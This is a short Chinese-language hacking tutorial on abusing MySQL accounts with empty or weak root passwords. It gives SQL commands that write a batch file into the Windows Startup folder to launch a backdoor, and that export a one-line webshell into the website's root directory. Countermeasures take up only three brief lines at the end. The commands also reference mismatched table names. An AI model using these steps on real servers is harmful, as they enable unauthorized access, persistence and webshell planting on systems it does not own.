过程：建立一个表→在表中输入我们的提权内容→出表→完成

1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器.

2.如果在得到用户名为：root 密码为：(空密码时候)，黑客就可以攻击进我们网站的.答案他们利用导出一句话木马.

3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件

4.虚拟主机提供商，自己给我们的mysql账号和密码.

一

创建新表，开机自启动，来得到cmd，其命令如下：

1：创建一个新的表

create table hx小龙 (cmd text);

含义:创建了一个新的表，表名为bycnboytest，表中只存放一个字段，字段名为cmd，为text文本]

二是：运行我们的后门木马之类的东西.大家自己灵活.

insert into hx小龙 values ("(路径)c:\cmd11.exe " );

三：输出表为一个bat的脚本文件

select * from bycnboytest into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\54td.bat";

导出一个文件文：54td.bat(c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\此路径才为开机自启动)

二

导出一句木马类：

执行：show databases; 看服务器中有些什么数据库

use test;进入数据库

show tables;查看我们进入数据库中有些什么数据表

create table hx小龙123 (cmd text); 创建一个新的表

insert into hx小龙123 values (" " );在表中插入一句话木马内容

select * from hx小龙123 into outfile "(导出到网站物理路径如)：D:\www\web\54td.asp";

应对措施：

将上方的启动目录，设置为不可写

安装关机还原等软件

网站重要文件进行加密等。